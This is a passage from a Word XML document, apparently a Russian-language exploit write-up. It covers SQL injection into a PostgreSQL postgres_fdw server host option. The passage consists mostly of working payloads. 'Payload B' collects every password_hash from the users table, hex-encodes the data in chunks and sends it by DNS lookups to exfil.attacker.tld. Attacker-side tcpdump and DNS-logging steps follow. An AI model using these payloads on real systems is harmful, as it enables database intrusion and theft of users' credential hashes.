        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD3FF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE USER MAPPING FOR CURRENT_USER SERVER ev OPTIONS (user 'x', password 'x');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188BD4E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FOREIGN TABLE t_ev(c text) SERVER ev OPTIONS (table_name 't');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47726FAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PERFORM * FROM t_ev;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C32A1E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END $$; --', port '5432', dbname 'main'); END $$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78F568" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PERFORM * FROM t_ev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запускает коннект к foreign server — libpq делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getaddrinfo("app_user.exfil.attacker.tld")</w:t>
      </w:r>
      <w:r>
        <w:t>, DNS-запрос приходит на authoritative-сервер атакующего. TCP-коннект потом упадёт (никто не слушает) — payload уже сработал на этапе DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746B40E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A547D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tcpdump -i any -nn 'port 53' | grep exfil.attacker.tld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC0E070" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — DNS-канал, chunked hex (полная таблица)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6EF56B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Та же цепочка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но host собирается из chunks. Hex-encoding с chunk-size 60 (лимит RFC 1035 на DNS label ≤63 байт). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LOOP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-блока создаёт по одному foreign server на каждый chunk — каждый SELECT запускает свой DNS-запрос. При пустой таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series(0, -1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вернёт пустое множество — итераций цикла не будет, это штатное поведение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C9BD59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `req.host`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5371D101" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>', port '5432', dbname 'x'); DECLARE rec record; BEGIN FOR rec IN WITH data AS (SELECT encode(convert_to((SELECT string_agg(password_hash, ',') FROM users), 'UTF8'), 'hex') AS hex) SELECT substring(hex FROM (i*60+1) FOR 60) AS c FROM data, generate_series(0, (length(hex)-1)/60) i LOOP EXECUTE format('CREATE SERVER IF NOT EXISTS ev_%s FOREIGN DATA WRAPPER postgres_fdw OPTIONS (host %L)', md5(rec.c), rec.c || '.exfil.attacker.tld'); EXECUTE format('CREATE USER MAPPING IF NOT EXISTS FOR CURRENT_USER SERVER ev_%s OPTIONS (user ''x'', password ''x'')', md5(rec.c)); EXECUTE format('CREATE FOREIGN TABLE IF NOT EXISTS t_%s(c text) SERVER ev_%s OPTIONS (table_name ''t'')', md5(rec.c), md5(rec.c)); EXECUTE format('SELECT 1 FROM t_%s', md5(rec.c)); END LOOP; END $$; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BECC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57667656" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DO $$ BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D6B35C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER IF NOT EXISTS app_src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB9C67" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FOREIGN DATA WRAPPER postgres_fdw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BD5F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OPTIONS (host '', port '5432', dbname 'x');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B2CB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE rec record;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009EF167" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FA121" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FOR rec IN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F56F57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WITH data AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBD47D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            SELECT encode(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64796715" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                convert_to((SELECT string_agg(password_hash, ',') FROM users), 'UTF8'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20746D05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                'hex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D870ADF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ) AS hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B8CD60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABB6D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT substring(hex FROM (i*60+1) FOR 60) AS c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22921D37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM data, generate_series(0, (length(hex)-1)/60) i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7788EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    LOOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC7337" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6CE8A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            'CREATE SERVER IF NOT EXISTS ev_%s FOREIGN DATA WRAPPER postgres_fdw OPTIONS (host %L)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59257F05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            md5(rec.c), rec.c || '.exfil.attacker.tld'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E86B970" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6184B043" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6AEB7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            'CREATE USER MAPPING IF NOT EXISTS FOR CURRENT_USER SERVER ev_%s OPTIONS (user ''x'', password ''x'')',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D8B22A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            md5(rec.c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E37BEFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA6BF8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470FAE03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            'CREATE FOREIGN TABLE IF NOT EXISTS t_%s(c text) SERVER ev_%s OPTIONS (table_name ''t'')',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9373A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            md5(rec.c), md5(rec.c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C85085" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5AE0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        EXECUTE format('SELECT 1 FROM t_%s', md5(rec.c));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B2D0E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END LOOP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0455BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END $$; --', port '5432', dbname 'main'); END $$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4759A26D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5(rec.c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нужен только чтобы дать уникальное имя SERVER/TABLE для каждого chunk — у этих имён есть ограничение NAMEDATALEN=63 и они не должны содержать недопустимых символов. Атакующий на authoritative-сервере склеивает DNS-labels в порядке прихода, делает hex-decode, разбивает по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — получает все </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B911FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3909D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Authoritative DNS с query-log (bind):</w:t>
      </w:r>
    </w:p>
